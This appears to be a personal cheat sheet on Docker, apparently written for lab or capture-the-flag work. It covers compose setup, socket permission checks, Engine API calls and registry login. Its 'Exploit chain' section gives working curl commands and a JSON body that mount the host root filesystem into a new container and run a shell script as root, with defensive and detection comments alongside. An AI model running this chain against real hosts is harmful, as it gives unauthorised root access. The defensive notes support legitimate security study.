Docker

  • Configurations.

## ------------------| docker-compose.yaml
version: "3"                    ## optional since v1.27.0
services:                       ## Map of service name -> container definition
    website:                    ## Service name
        image: nginx            ## No tag given, so this resolves to nginx:latest; pin a tag or digest for repeatable deploys
        ports:
            - "8080:80"         ## host:container; published on all host interfaces unless a host IP is prefixed (e.g. "127.0.0.1:8080:80")
        restart: always         ## Restart whenever the container stops, and when the Docker daemon starts (e.g. after a reboot)
       
         
## ------------------| Start/Stop
### sudo is needed when the current user is not in the docker group
### Start/Run: create and start the services in the background (-d = detached)
sudo docker-compose up -d
### Stop: halt the running containers but keep them so they can be started again
sudo docker-compose stop
### Down: stop the containers and remove them together with the networks that up created
sudo docker-compose down
  • Is the Docker socket writable?

## ------------------| How to check
### Read the owner, group and mode bits; a default install usually shows root:docker with mode srw-rw----.
### Anyone who can write to this socket can drive the daemon (which runs as root unless rootless mode is used),
### so treat write access as root-equivalent on the host: keep the docker group small and
### avoid bind-mounting the socket into containers.
ls -al /var/run/docker.sock

## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
### The Engine API is plain HTTP spoken over the unix socket; "localhost" in the URL is only a placeholder host.
### List the images stored locally
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
### List the running containers
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

## ------------------| Exploit chain
### Why this works: the API caller chooses the container's bind mounts, so write access to the socket
### is enough to have the host root filesystem mounted into a container.
### Defensive takeaway: restrict who can reach the socket; rootless mode or an authorization plugin
### limits what such a request can do.
### Create a new container --> map the root drive
### We need to know which image we can use; run the following command and take the RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]'

### Create the JSON object in a file. Remove the ## comments first (JSON has no comment syntax).
{
    "Image" : "sandbox", ## <---- RepoTags value
    "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
    "Binds" : [
        "/:/mnt:rw"
    ]
}

### Use curl to create the new container from the JSON file
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create

### Get the id value from the create response; put it in place of <ID>; start the container
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
### Detection: both calls show up as create/start entries in "docker events", and "docker inspect"
### on the resulting container lists the host-root bind under Mounts; alert on containers that bind-mount "/".
  • Login

## ------------------| Normal login
### Credentials are saved in ~/.docker/config.json, only base64-encoded unless a credential helper (credsStore) is configured
docker login <URL>

## ------------------| If it has a certificate file
### Trust the registry's CA for this one registry only: the directory name must match the registry host
### (host:port when a port is used), and Docker then verifies that registry's TLS certificate against ca.crt
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL>

### insecure-registries tells Docker to ignore certificate errors for the listed registry and to fall back to
### plain HTTP, so logins and pulls to it can be intercepted; prefer trusting the registry CA through
### /etc/docker/certs.d (above) and keep this list as short as possible.
cat /etc/docker/daemon.json
{                                                                                                                                                                     
   "insecure-registries":["docker.registry.htb:443"]                                                                                                                      
}
